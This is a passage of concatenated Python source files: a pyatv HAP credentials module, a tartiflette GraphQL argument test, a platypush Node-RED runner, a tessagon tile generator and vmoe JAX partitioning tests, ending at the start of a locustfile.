"""Abstraction for authentication based on HAP/SRP."""
import binascii
from enum import Enum, auto
from typing import Optional, Tuple
from pyatv import exceptions
# pylint: disable=invalid-name
class AuthenticationType(Enum):
"""Supported authentication type."""
Null = auto()
"""No authentication (just pass through)."""
Legacy = auto()
"""Legacy SRP based authentication."""
HAP = auto()
"""Authentication based on HAP (Home-Kit)."""
Transient = auto()
"""Authentication based on transient HAP (Home-Kit)."""
# pylint: enable=invalid-name
class HapCredentials:
"""Identifiers and encryption keys used by HAP."""
def __init__(
self,
ltpk: bytes = b"",
ltsk: bytes = b"",
atv_id: bytes = b"",
client_id: bytes = b"",
) -> None:
"""Initialize a new Credentials."""
self.ltpk: bytes = ltpk
self.ltsk: bytes = ltsk
self.atv_id: bytes = atv_id
self.client_id: bytes = client_id
self.type: AuthenticationType = self._get_auth_type()
def _get_auth_type(self) -> AuthenticationType:
if (
self.ltpk == b""
and self.ltsk == b""
and self.atv_id == b""
and self.client_id == b""
):
return AuthenticationType.Null
if self.ltpk == b"transient":
return AuthenticationType.Transient
if (
self.ltpk == b""
and self.ltsk != b""
and self.atv_id == b""
and self.client_id != b""
):
return AuthenticationType.Legacy
if self.ltpk and self.ltsk and self.atv_id and self.client_id:
return AuthenticationType.HAP
raise exceptions.InvalidCredentialsError("invalid credentials type")
def __eq__(self, other: object) -> bool:
"""Return if two instances of HapCredentials are equal."""
if isinstance(other, HapCredentials):
return str(other) == str(self)
return False
def __str__(self) -> str:
"""Return a string representation of credentials."""
return ":".join(
[
binascii.hexlify(self.ltpk).decode("utf-8"),
binascii.hexlify(self.ltsk).decode("utf-8"),
binascii.hexlify(self.atv_id).decode("utf-8"),
binascii.hexlify(self.client_id).decode("utf-8"),
]
)
class PairSetupProcedure:
"""Perform pair setup procedure to authenticate a new device."""
async def start_pairing(self) -> None:
"""Start the pairing process.
This method will show the expected PIN on screen.
"""
async def finish_pairing(self, username: str, pin_code: int) -> HapCredentials:
"""Finish pairing process.
A username and the PIN code (usually shown on screen) must be provided.
"""
class PairVerifyProcedure:
"""Verify if credentials are valid and derive encryption keys."""
async def verify_credentials(self) -> bool:
"""Verify if credentials are valid and returns True if keys are generated."""
def encryption_keys(
self, salt: str, output_info: str, input_info: str
) -> Tuple[str, str]:
"""Return derived encryption keys."""
NO_CREDENTIALS = HapCredentials()
TRANSIENT_CREDENTIALS = HapCredentials(b"transient")
def parse_credentials(detail_string: Optional[str]) -> HapCredentials:
"""Parse a string represention of HapCredentials."""
if detail_string is None:
return NO_CREDENTIALS
split = detail_string.split(":")
# Compatibility with "legacy credentials" used by AirPlay where seed is stored
# as LTSK and identifier as client_id (others are empty).
if len(split) == 2:
client_id = binascii.unhexlify(split[0])
ltsk = binascii.unhexlify(split[1])
return HapCredentials(b"", ltsk, b"", client_id)
if len(split) == 4:
ltpk = binascii.unhexlify(split[0])
ltsk = binascii.unhexlify(split[1])
atv_id = binascii.unhexlify(split[2])
client_id = binascii.unhexlify(split[3])
return HapCredentials(ltpk, ltsk, atv_id, client_id)
raise exceptions.InvalidCredentialsError("invalid credentials: " + detail_string)
|
tests/functional/regressions/test_issue213.py | remorses/tartiflette-whl | 530 | 12718661 | import pytest
from tartiflette import Resolver, create_engine
_SDL = """
type Query {
hello(name: String = "Unknown"): String
bye(name: String! = "Unknown"): String
}
"""
@pytest.fixture(scope="module")
async def ttftt_engine():
@Resolver("Query.hello", schema_name="test_issue213")
async def resolve_query_hello(parent, args, ctx, info):
return args.get("name")
class QueryByResolver:
async def __call__(self, parent, args, ctx, info):
return args.get("name")
Resolver("Query.bye", schema_name="test_issue213")(QueryByResolver())
return await create_engine(sdl=_SDL, schema_name="test_issue213")
@pytest.mark.asyncio
@pytest.mark.parametrize(
"query,variables,expected",
[
# Without variables
(
"""
query {
hello
}
""",
None,
{"data": {"hello": "Unknown"}},
),
(
"""
query {
hello(name: "Name")
}
""",
None,
{"data": {"hello": "Name"}},
),
(
"""
query {
hello(name: null)
}
""",
None,
{"data": {"hello": None}},
),
(
"""
query {
bye
}
""",
None,
{"data": {"bye": "Unknown"}},
),
(
"""
query {
bye(name: "Name")
}
""",
None,
{"data": {"bye": "Name"}},
),
(
"""
query {
bye(name: null)
}
""",
None,
{
"data": None,
"errors": [
{
"message": "Argument < name > of non-null type < String! > must not be null.",
"path": ["bye"],
"locations": [{"line": 3, "column": 19}],
"extensions": {
"rule": "5.6.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Values-of-Correct-Type",
"tag": "values-of-correct-type",
},
}
],
},
),
# With variables
(
"""
query ($name: String) {
hello(name: $name)
}
""",
{},
{"data": {"hello": "Unknown"}},
),
(
"""
query ($name: String) {
hello(name: $name)
}
""",
{"name": "Name"},
{"data": {"hello": "Name"}},
),
(
"""
query ($name: String) {
hello(name: $name)
}
""",
{"name": None},
{"data": {"hello": None}},
),
(
"""
query ($name: String) {
bye(name: $name)
}
""",
{},
{"data": {"bye": "Unknown"}},
),
(
"""
query ($name: String) {
bye(name: $name)
}
""",
{"name": "Name"},
{"data": {"bye": "Name"}},
),
(
"""
query ($name: String) {
bye(name: $name)
}
""",
{"name": None},
{
"data": {"bye": None},
"errors": [
{
"message": "Argument < name > of non-null type < String! > must not be null.",
"path": ["bye"],
"locations": [{"line": 3, "column": 25}],
}
],
},
),
(
"""
query ($name: String!) {
bye(name: $name)
}
""",
{"name": None},
{
"data": None,
"errors": [
{
"message": "Variable < $name > of non-null type < String! > must not be null.",
"path": None,
"locations": [{"line": 2, "column": 20}],
}
],
},
),
],
)
async def test_issue213(query, variables, expected, ttftt_engine):
assert await ttftt_engine.execute(query, variables=variables) == expected
|
platypush/backend/nodered/runner.py | RichardChiang/platypush | 228 | 12718673 | <reponame>RichardChiang/platypush
import json
from pynodered import node_red
from platypush.context import get_plugin
# noinspection PyUnusedLocal
@node_red(name='run', title='run', category='platypush', description='Run a platypush action')
def run(node, msg):
msg = msg['payload']
if isinstance(msg, bytes):
msg = msg.decode()
if isinstance(msg, str):
msg = json.loads(msg)
assert isinstance(msg, dict) and 'action' in msg
if 'type' not in msg:
msg['type'] = 'request'
plugin_name = '.'.join(msg['action'].split('.')[:-1])
action_name = msg['action'].split('.')[-1]
plugin = get_plugin(plugin_name)
action = getattr(plugin, action_name)
args = msg.get('args', {})
response = action(**args)
if response.errors:
raise response.errors[0]
msg['payload'] = response.output
return msg
# vim:sw=4:ts=4:et:
|
tessagon/core/rotate_tile_generator.py | virtualritz/tessagon | 199 | 12718691 | <reponame>virtualritz/tessagon
from tessagon.core.tile_generator import TileGenerator
from tessagon.core.abstract_tile import AbstractTile
class RotateTileGenerator(TileGenerator):
# This generates tiles that are rotated from a regular
# grid arrangement.
def __init__(self, tessagon, **kwargs):
super().__init__(tessagon, **kwargs)
self.rot_factor = kwargs['rot_factor']
self.color_pattern = kwargs.get('color_pattern') or None
# Rot tiles are not tiles, they are a collection of tiles.
# They generate interior tiles ((rot_factor - 1)^2 of them) and
# up to 2 * rot_factor boundary tiles that are shared with neighbors
# (if they exist).
# Maximum tiles generated per rot_tile is rot_factor^2 + 1 tiles
# With this in mind, you'll want to set u_num and v_num lower than
# you would with the grid tile generator
self.rot_tiles = None
self.id_prefix = 'rot_tiles'
def create_tiles(self):
self.rot_tiles \
= self.initialize_tiles(RotTile,
rot_factor=self.rot_factor,
color_pattern=self.color_pattern)
self.initialize_neighbors(self.rot_tiles)
self.initialize_interiors()
self.initialize_boundaries()
self.calculate_boundary_neighbors()
return self.calculate_rot_tiles()
def initialize_interiors(self):
for rot_tile in [j for i in self.rot_tiles for j in i]:
rot_tile.initialize_interior()
def initialize_boundaries(self):
for rot_tile in [j for i in self.rot_tiles for j in i]:
rot_tile.initialize_boundary()
def calculate_boundary_neighbors(self):
for rot_tile in [j for i in self.rot_tiles for j in i]:
rot_tile.calculate_boundary_neighbors()
def calculate_rot_tiles(self):
tiles = []
for rot_tile in [j for i in self.rot_tiles for j in i]:
tiles += rot_tile.create_tiles()
return tiles
# This is both a kind of tile and a tile generator
# It hurts my brain thinking about this stuff
class RotTile(AbstractTile):
def __init__(self, tessagon, **kwargs):
super().__init__(tessagon, **kwargs)
self.n = kwargs['rot_factor']
# the interior and each boundary is a collection of tiles
self.interior = None
self.boundary = {'left': None,
'right': None,
'top': None,
'bottom': None}
self.interior_corners = None
self.color_pattern = kwargs.get('color_pattern') or None
self.u_num = self.tessagon.tile_generator.u_num
# We'll use these constants a lot
n2_p1 = self.n**2 + 1.0
self.c1 = 1.0 / n2_p1
self.c2 = self.n / n2_p1
self.c3 = 1.0 - self.c2
self.c4 = 1.0 - self.c1
self.tiles = []
def initialize_interior(self):
self.interior_corners = [self.blend(self.c2, self.c1),
self.blend(self.c4, self.c2),
self.blend(self.c1, self.c3),
self.blend(self.c3, self.c4)]
if self.n < 2:
return
offset = self.basic_offset(self.fingerprint)
generator = TileGenerator(self.tessagon,
corners=self.interior_corners,
u_num=self.n-1, v_num=self.n-1,
u_cyclic=False, v_cyclic=False,
id_prefix=self.id + '.interior',
color_pattern=self.color_pattern,
fingerprint_offset=offset)
self.interior \
= generator.initialize_tiles(self.tessagon.__class__.tile_class)
generator.initialize_neighbors(self.interior)
self.tiles += self._flatten_list(self.interior)
def basic_offset(self, fingerprint):
return [fingerprint[0] * self.n + fingerprint[1] + 1,
self.u_num - fingerprint[0] + fingerprint[1] * self.n]
def create_tiles(self):
return self.tiles
def initialize_boundary(self):
self.initialize_left_boundary(self.id + ".boundary['left']")
self.initialize_right_boundary(self.id + ".boundary['right']")
self.initialize_top_boundary(self.id + ".boundary['top']")
self.initialize_bottom_boundary(self.id + ".boundary['bottom']")
def initialize_left_boundary(self, id_prefix):
if not self.boundary['left']:
tile = self.get_neighbor_tile(['left'])
if tile:
corners = [self.blend(0, 0),
self.blend(self.c2, self.c1),
self.blend(self.c3 - 1.0, self.c4),
self.blend(0, 1)]
offset = self.basic_offset(self.fingerprint)
offset[0] -= 1
generator = TileGenerator(self.tessagon,
corners=corners,
u_num=1, v_num=self.n,
u_cyclic=False, v_cyclic=False,
id_prefix=id_prefix,
color_pattern=self.color_pattern,
fingerprint_offset=offset)
tiles = generator.initialize_tiles(self.tessagon.tile_class)
generator.initialize_neighbors(tiles)
self.boundary['left'] = tiles
tile.boundary['right'] = tiles
self.tiles += self._flatten_list(tiles)
def initialize_bottom_boundary(self, id_prefix):
if not self.boundary['bottom']:
tile = self.get_neighbor_tile(['bottom'])
if tile:
corners = [self.blend(self.c1, self.c3 - 1.0),
self.blend(1, 0),
self.blend(0, 0),
self.blend(self.c4, self.c2)]
offset = self.basic_offset(self.fingerprint)
offset[0] -= 1
offset[1] -= 1
generator = TileGenerator(self.tessagon,
corners=corners,
u_num=self.n, v_num=1,
u_cyclic=False, v_cyclic=False,
id_prefix=id_prefix,
color_pattern=self.color_pattern,
fingerprint_offset=offset)
tiles = generator.initialize_tiles(self.tessagon.tile_class)
generator.initialize_neighbors(tiles)
self.boundary['bottom'] = tiles
tile.boundary['top'] = tiles
self.tiles += self._flatten_list(tiles)
def initialize_right_boundary(self, id_prefix):
if not self.boundary['right']:
tile = self.get_neighbor_tile(['right'])
if tile:
tile.initialize_left_boundary(id_prefix)
def initialize_top_boundary(self, id_prefix):
if not self.boundary['top']:
tile = self.get_neighbor_tile(['top'])
if tile:
tile.initialize_bottom_boundary(id_prefix)
def calculate_boundary_neighbors(self):
self.calculate_left_boundary_neighbors()
self.calculate_right_boundary_neighbors()
self.calculate_top_boundary_neighbors()
self.calculate_bottom_boundary_neighbors()
def calculate_left_boundary_neighbors(self):
if self.boundary['left']:
for i in range(self.n - 1):
boundary_tile = self.boundary['left'][0][i]
other_tile = None
if self.n > 1:
other_tile = self.interior[0][i]
if other_tile:
boundary_tile.neighbors['right'] = other_tile
other_tile.neighbors['left'] = boundary_tile
if self.boundary['top']:
boundary_tile = self.boundary['left'][0][self.n-1]
other_tile = self.boundary['top'][0][0]
boundary_tile.neighbors['right'] = other_tile
other_tile.neighbors['left'] = boundary_tile
def calculate_bottom_boundary_neighbors(self):
if self.boundary['bottom']:
for i in range(self.n - 1):
boundary_tile = self.boundary['bottom'][i+1][0]
other_tile = None
if self.n > 1:
other_tile = self.interior[i][0]
if other_tile:
boundary_tile.neighbors['top'] = other_tile
other_tile.neighbors['bottom'] = boundary_tile
if self.boundary['left']:
boundary_tile = self.boundary['bottom'][0][0]
other_tile = self.boundary['left'][0][0]
boundary_tile.neighbors['top'] = other_tile
other_tile.neighbors['bottom'] = boundary_tile
def calculate_right_boundary_neighbors(self):
if self.boundary['right']:
for i in range(self.n - 1):
boundary_tile = self.boundary['right'][0][i+1]
other_tile = None
if self.n > 1:
other_tile = self.interior[self.n-2][i]
if other_tile:
boundary_tile.neighbors['left'] = other_tile
other_tile.neighbors['right'] = boundary_tile
if self.boundary['bottom']:
boundary_tile = self.boundary['right'][0][0]
other_tile = self.boundary['bottom'][self.n-1][0]
boundary_tile.neighbors['left'] = other_tile
other_tile.neighbors['right'] = boundary_tile
def calculate_top_boundary_neighbors(self):
if self.boundary['top']:
for i in range(self.n - 1):
boundary_tile = self.boundary['top'][i][0]
other_tile = None
if self.n > 1:
other_tile = self.interior[i][self.n-2]
if other_tile:
boundary_tile.neighbors['bottom'] = other_tile
other_tile.neighbors['top'] = boundary_tile
if self.boundary['right']:
boundary_tile = self.boundary['top'][self.n-1][0]
other_tile = self.boundary['right'][0][self.n-1]
boundary_tile.neighbors['bottom'] = other_tile
other_tile.neighbors['top'] = boundary_tile
def _flatten_list(self, l):
return [item for sublist in l for item in sublist]
|
vmoe/partitioning_test.py | google-research/vmoe | 205 | 12718703 | <reponame>google-research/vmoe
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for partitioning."""
import functools
import itertools
import logging
import re
from unittest import mock
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
import numpy as np
from vmoe import partitioning
PartitionSpec = partitioning.PartitionSpec
class PartitioningTest(parameterized.TestCase):
@parameterized.parameters((0, True), (1, False), (2, True))
def test_process_has_contiguous_device_slice(self, process_index, expected):
def mk_dev(process_index):
return _make_device(process_index=process_index)
devices = np.asarray([
[mk_dev(0), mk_dev(0), mk_dev(1)],
[mk_dev(0), mk_dev(0), mk_dev(2)],
[mk_dev(0), mk_dev(0), mk_dev(1)],
])
self.assertEqual(
partitioning.process_has_contiguous_device_slice(
devices, process_index), expected)
@parameterized.named_parameters(
('false', [[0, 0, 1], [0, 0, 2], [0, 0, 1]], False),
('true', [[0, 0, 0], [0, 0, 0], [1, 1, 1]], True),
)
def test_processes_have_contiguous_device_slices(self, devices, expected):
def mk_dev(process_index):
return _make_device(process_index=process_index)
devices = np.asarray(devices)
devices = np.vectorize(mk_dev, otypes=[np.object])(devices)
self.assertEqual(
partitioning.processes_have_contiguous_device_slices(devices),
expected)
@parameterized.parameters(('other'), ('tpu'))
def test_get_auto_logical_mesh(self, platform):
"""Tests that the right auto_logical_mesh is run, based on the platform."""
hardware_mesh = mock.MagicMock()
device = _make_device(platform=platform)
with mock.patch.object(
partitioning,
f'get_hardware_mesh_{platform}',
return_value=hardware_mesh):
with mock.patch.object(
partitioning, f'get_auto_logical_mesh_{platform}') as mock_get:
partitioning.get_auto_logical_mesh(2, [device])
mock_get.assert_called_with(2, hardware_mesh)
@parameterized.named_parameters(
('2', 2, (2, 1)),
('4', 4, (4, 1)),
('8', 8, (4, 2)),
)
@mock.patch.object(partitioning, 'get_logical_mesh')
def test_get_auto_logical_mesh_other(self, num_partitions, expected_tuple,
get_logical_mesh_mock):
"""Tests that each axis is partitioned as expected on devices != TPU."""
hardware_mesh = np.empty((4, 8))
partitioning.get_auto_logical_mesh_other(num_partitions, hardware_mesh)
get_logical_mesh_mock.assert_called_with(expected_tuple, hardware_mesh)
def test_get_auto_logical_mesh_other_error(self):
"""Tests that an exception is raised if the number of partitions is not supported."""
hardware_mesh = np.empty((3, 5))
with self.assertRaisesRegex(ValueError, 'The hardware mesh with shape'):
partitioning.get_auto_logical_mesh_other(2, hardware_mesh)
@parameterized.named_parameters(
('v3_2', 2, (2, 2, 4, 1), (1, 2, 1, 1)),
('v3_4', 4, (2, 2, 4, 1), (1, 2, 2, 1)),
('v3_8', 8, (2, 2, 4, 1), (1, 2, 4, 1)),
('v3_16', 16, (2, 2, 4, 1), (2, 2, 4, 1)),
('v4_2', 2, (2, 2, 4, 2), (1, 1, 1, 2)),
('v4_4', 4, (2, 2, 4, 2), (1, 1, 2, 2)),
('v4_8', 8, (2, 2, 4, 2), (1, 1, 4, 2)),
('v4_16', 16, (2, 2, 4, 2), (1, 2, 4, 2)),
('v4_32', 32, (2, 2, 4, 2), (2, 2, 4, 2)),
)
@mock.patch.object(partitioning, 'get_logical_mesh')
def test_get_auto_logical_mesh_tpu(self, num_partitions, hardware_mesh_shape,
expected_tuple, get_logical_mesh_mock):
"""Tests that each axis is partitioned as expected on TPU devices."""
hardware_mesh = np.empty(hardware_mesh_shape)
partitioning.get_auto_logical_mesh_tpu(num_partitions, hardware_mesh)
get_logical_mesh_mock.assert_called_with(expected_tuple, hardware_mesh)
def test_get_auto_logical_mesh_tpu_error(self):
"""Tests that an exception is raised if the number of partitions is not supported."""
hardware_mesh = np.empty((3, 5, 7, 9))
with self.assertRaisesRegex(ValueError, 'The hardware mesh with shape'):
partitioning.get_auto_logical_mesh_tpu(6, hardware_mesh)
@parameterized.named_parameters(
('cpu0', (0, 0), (0, 0)),
('cpu1', (23, 5), (3, 5)),
)
@mock.patch.object(partitioning.jax, 'local_device_count', return_value=4)
def test_get_device_coords_other(self, device_attrs, expected_coord, _):
"""Tests that the device coordinates are good for devices other than TPU."""
device_id, process_id = device_attrs
device = _make_device(
id=device_id, process_index=process_id, platform='cpu')
self.assertTupleEqual(
partitioning.get_device_coords_other(device), expected_coord)
@parameterized.named_parameters(
('tpu0', (0, 0, 0, 0)),
('tpu1', (0, 1, 2, 3)),
)
def test_get_device_coords_tpu(self, expected_coord):
"""Tests that the device coordinates are good for TPU devices."""
core_on_chip, x, y, z = expected_coord
device = _make_device(
core_on_chip=core_on_chip, coords=(x, y, z), platform='tpu')
self.assertTupleEqual(
partitioning.get_device_coords_tpu(device), expected_coord)
def test_get_hardware_mesh_local_shape(self):
local_devices = [
# Local devices presented in arbitrary order.
_make_device(core_on_chip=0, coords=(2, 2, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(2, 3, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(3, 2, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(3, 1, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(3, 3, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(2, 1, 0), platform='tpu'),
]
shape = partitioning.get_hardware_mesh_local_shape(local_devices)
expected_shape = (1, 2, 3, 1)
self.assertEqual(shape, expected_shape)
@mock.patch.object(partitioning.jax, 'local_device_count', return_value=2)
def test_get_hardware_mesh_other(self, _):
"""Tests the hardware mesh (with 6 total CPU devices in 2 processes)."""
devices = []
for process_index in range(3):
for device_id in range(process_index * 2, process_index * 2 + 2):
devices.append(
_make_device(
id=device_id, process_index=process_index, platform='cpu'))
hardware_mesh = partitioning.get_hardware_mesh_other(devices)
expected_hardware_mesh = np.array([[devices[0], devices[2], devices[4]],
[devices[1], devices[3], devices[5]]])
np.testing.assert_array_equal(hardware_mesh, expected_hardware_mesh)
def test_get_hardware_mesh_tpu(self):
"""Tests the hardware mesh (with 12 TPU devices, in a (2, 3, 1, 2) mesh)."""
devices = []
for z, y, x, core_on_chip in itertools.product(
range(2), range(3), range(1), range(2)):
devices.append(
_make_device(
core_on_chip=core_on_chip, coords=(x, y, z), platform='tpu'))
hardware_mesh = partitioning.get_hardware_mesh_tpu(devices)
expected_hardware_mesh = np.array([
# core_on_chip=0.
[[[devices[0], devices[6]],
[devices[2], devices[8]],
[devices[4], devices[10]]]],
# core_on_chip=1.
[[[devices[1], devices[7]],
[devices[3], devices[9]],
[devices[5], devices[11]]]]
], dtype=np.object)
np.testing.assert_array_equal(hardware_mesh, expected_hardware_mesh)
def test_get_logical_mesh_default(self):
"""Tests the logical mesh with a 2x4 hardware mesh."""
# Note: The values in hardware_mesh would typically be Devices, but these
# are fine for testing. This is a 2x4 hardware mesh.
hardware_mesh = np.array([[1, 2, 3, 4], # partition_ids: 0 0 1 1
[5, 6, 7, 8]]) # 2 2 3 3
partitions, replicas = (2, 2), (1, 2)
mesh = partitioning.get_logical_mesh_default(
partitions, replicas, hardware_mesh)
self.assertIsInstance(mesh, partitioning.maps.Mesh)
np.testing.assert_array_equal(mesh.devices,
[[1, 2], [3, 4], [5, 6], [7, 8]])
self.assertTupleEqual(mesh.axis_names, ('expert', 'replica'))
def test_get_logical_mesh_tile_by_process(self):
# Note: The values in hardware_mesh would typically be Devices, but these
# are fine for testing. This is a 2x4 hardware mesh.
# partition_ids: 0 0 1 1 | process_ids: 0 1 2 3
# 2 2 3 3 | 0 1 2 3
hardware_mesh = np.asarray([[1, 2, 3, 4],
[5, 6, 7, 8]])
partitions, replicas = (2, 2), (1, 2)
hardware_mesh_local_shape = (2, 1)
mesh = partitioning.get_logical_mesh_tile_by_process(
partitions, replicas, hardware_mesh, hardware_mesh_local_shape)
self.assertIsInstance(mesh, partitioning.maps.Mesh)
np.testing.assert_array_equal(mesh.devices,
[[1, 2], [5, 6], [3, 4], [7, 8]])
self.assertTupleEqual(mesh.axis_names, ('expert', 'replica'))
def test_get_logical_mesh_tile_by_process_raises(self):
hardware_mesh = np.zeros((3, 3))
partitions, replicas = (3, 1), (1, 3)
hardware_mesh_local_shape = (1, 2)
with self.assertRaises(ValueError):
partitioning.get_logical_mesh_tile_by_process(
partitions, replicas, hardware_mesh, hardware_mesh_local_shape)
@mock.patch.object(partitioning,
'processes_have_contiguous_device_slices',
return_value=False)
@mock.patch.object(partitioning, 'get_hardware_mesh_local_shape')
def test_get_logical_mesh(self, mock_get_hardware_mesh_local_shape, _):
# Note: The values in hardware_mesh would typically be Devices, but these
# are fine for testing. This is a 2x4 hardware mesh.
# partition_ids: 0 1 2 3 | process_ids: 0 0 2 3
# 0 1 2 3 | 1 1 2 3
hardware_mesh = np.asarray([[1, 2, 3, 4],
[5, 6, 7, 8]])
mock_get_hardware_mesh_local_shape.return_value = (2, 1)
mesh = partitioning.get_logical_mesh((2, 2), hardware_mesh)
np.testing.assert_array_equal(mesh.devices,
[[1, 2], [5, 6], [3, 4], [7, 8]])
def test_log_logical_mesh_tpu(self):
mk_dev = functools.partial(_make_device, platform='tpu')
devices = [
[
mk_dev(core_on_chip=0, coords=(0, 0, 0), process_index=0),
mk_dev(core_on_chip=1, coords=(0, 0, 0), process_index=1),
mk_dev(core_on_chip=0, coords=(10, 0, 0), process_index=10),
mk_dev(core_on_chip=1, coords=(10, 0, 0), process_index=11),
],
[
mk_dev(core_on_chip=0, coords=(0, 100, 0), process_index=1),
mk_dev(core_on_chip=1, coords=(0, 100, 0), process_index=2),
mk_dev(core_on_chip=0, coords=(10, 1, 0), process_index=3),
mk_dev(core_on_chip=1, coords=(10, 1, 0), process_index=4),
],
]
mesh = partitioning.Mesh(devices=np.asarray(devices), axis_names=('a', 'b'))
logger = logging.getLogger('foo')
with self.assertLogs(logger) as cm:
partitioning.log_logical_mesh(mesh, logger=logger)
self.assertRegex(
cm.output[0],
re.escape("Logical device mesh has axis_names = ('a', 'b')"))
self.assertRegex(
cm.output[1],
re.escape('Logical device mesh has shape = (2, 4)'))
self.assertRegex(cm.output[2], 'Logical device mesh:')
self.assertRegex(cm.output[3], '\\+[-]+\\+')
# pylint: disable=line-too-long
self.assertRegex(
cm.output[4],
re.escape('| (0, 0, 0, 0)[ 0] (1, 0, 0, 0)[ 1] (0, 10, 0, 0)[10] (1, 10, 0, 0)[11] |'))
self.assertRegex(
cm.output[5],
re.escape('| (0, 0, 100, 0)[ 1] (1, 0, 100, 0)[ 2] (0, 10, 1, 0)[ 3] (1, 10, 1, 0)[ 4] |'))
# pylint: enable=line-too-long
self.assertRegex(cm.output[6], '\\+[-]+\\+')
@mock.patch.object(jax, 'local_device_count', return_value=4)
def test_log_logical_mesh_single_axis(self, unused_mock):
devices = [_make_device(id=0, process_index=0, platform='cpu'),
_make_device(id=10, process_index=10, platform='cpu')]
mesh = partitioning.Mesh(devices=np.asarray(devices), axis_names=('a',))
logger = logging.getLogger('foo')
with self.assertLogs(logger) as cm:
partitioning.log_logical_mesh(mesh, logger=logger)
self.assertRegex(
cm.output[0], re.escape("Logical device mesh has axis_names = ('a',)"))
self.assertRegex(
cm.output[1], re.escape('Logical device mesh has shape = (2,)'))
self.assertRegex(cm.output[2], 'Logical device mesh:')
self.assertRegex(cm.output[3], '\\+[-]+\\+')
self.assertRegex(cm.output[4], re.escape('| (0, 0)[ 0] |'))
self.assertRegex(cm.output[5], re.escape('| (2, 10)[10] |'))
self.assertRegex(cm.output[6], '\\+[-]+\\+')
def test_tree_global_shape(self):
"""Tests that global shape of arrays is obtained correctly."""
# Note: see _make_tree_axis_resources_mesh_test_data for additional details.
tree, axis_resources, mesh = _make_tree_axis_resources_mesh_test_data()
expected_global_aval = {
'v': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'w': jax.ShapedArray(shape=(4 * 5, 5), dtype=jnp.float32),
'x': jax.ShapedArray(shape=(4 * 2 * 5, 5), dtype=jnp.float32),
'y': jax.ShapedArray(shape=(4 * 5, 2 * 5), dtype=jnp.float32),
'z': jax.ShapedArray(shape=(4 * 3 * 5, 2 * 5), dtype=jnp.float32),
}
global_aval = partitioning.tree_global_shape(tree, axis_resources, mesh)
self.assertDictEqual(global_aval, expected_global_aval)
def test_tree_global_shape_raises_structs_not_match(self):
mesh = partitioning.Mesh(devices=np.zeros((4, 4)), axis_names=('a', 'b'))
with self.assertRaisesRegex(ValueError, 'The tree structs do not match'):
partitioning.tree_global_shape({'a': 1, 'b': 2}, {'c': PartitionSpec()},
mesh)
def test_tree_global_shape_raises_wrong_leaves(self):
mesh = partitioning.Mesh(devices=np.zeros((4, 4)), axis_names=('a', 'b'))
with self.assertRaisesRegex(ValueError, 'the input tree must have'):
partitioning.tree_global_shape({'a': 1}, {'a': PartitionSpec()}, mesh)
class ParsePartitionSpecTest(parameterized.TestCase):
@parameterized.named_parameters(
('_none', None, PartitionSpec()),
('_string', 'a', PartitionSpec('a')),
('_tuple', ('a', ('b', 'c')), PartitionSpec('a', ('b', 'c'))),
('_partition_spec', PartitionSpec('a'), PartitionSpec('a')),
)
def test(self, spec, expected):
self.assertEqual(partitioning.parse_partition_spec(spec), expected)
class TreeAxisResourcesFromRegexesTest(parameterized.TestCase):
@parameterized.named_parameters(
('_empty_regexes', {'a': 1, 'b': 2, 'c': 3}, [],
{'a': PartitionSpec(), 'b': PartitionSpec(), 'c': PartitionSpec()}),
('_single_string', {'a': 1, 'b': 2, 'c': 3},
[('b', 'x')],
{'a': PartitionSpec(), 'b': PartitionSpec('x'), 'c': PartitionSpec()}),
('_first_match', {'a': 1, 'bb': 2, 'c': 3},
[('b', ('x',)), ('bb', ('x', 'y'))],
{'a': PartitionSpec(), 'bb': PartitionSpec('x'), 'c': PartitionSpec()}),
)
def test(self, tree, axis_resources_regexes, expected):
output = partitioning.tree_axis_resources_from_regexes(
tree=tree, axis_resources_regexes=axis_resources_regexes)
self.assertEqual(output, expected)
def _make_device(**kwargs):
"""Returns a new mocked device."""
device = mock.MagicMock(partitioning.Device)
for key, value in kwargs.items():
setattr(device, key, value)
return device
def _make_tree_axis_resources_mesh_test_data():
# Mesh of (4, 3, 2) devices. Each device resides in a different process to
# simplify the calculation of global shapes of the arrays.
devices = np.asarray(
[_make_device(process_index=idx, id=idx) for idx in range(24)],
dtype=np.object).reshape(4, 3, 2)
mesh = partitioning.Mesh(devices, axis_names=('a', 'b', 'c'))
# These shapes are those of the arrays in the process running the code
# (i.e. process_index=0).
tree = {
'v': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'w': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'x': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'y': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'z': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
}
axis_resources = {
# Array 'v' is not partitioned, each device holds a replica of this.
# Thus, the global shape is (5, 5).
'v': None,
# Array 'w' has its first axis partitioned in 4 chunks across the
# axis 'a' of the logical mesh. Thus, its global shape is (4 * 5, 5).
'w': PartitionSpec('a'),
# Array 'x' has its first axis partitioned in 4 * 2 chunks across the
# axes 'a' and 'c' of the logical mesh. Thus its global shape is
# (4 * 2 * 5, 5).
'x': PartitionSpec(('a', 'c'),),
# Array 'y' has its first axis partitioned in 4 chunks (across logical
# axis 'a') and the second axis partitioned in 2 chunks (across logical
# axis 'c'). Thus its global shape is (4 * 5, 2 * 5).
'y': PartitionSpec('a', 'c'),
# Array 'z' has its first axis partitioned in 4 * 3 chunks, and the
# second axis partitioned in 2 chunks. Its global shape is
# (4 * 3 * 5, 2 * 5).
'z': PartitionSpec(('a', 'b'), 'c'),
}
return tree, axis_resources, mesh
if __name__ == '__main__':
absltest.main()
|
medium/flask-testing/locustfile.py | saneravi/ML_Stuff | 209 | 12718711 | <filename>medium/flask-testing/locustfile.py
# Third party modules
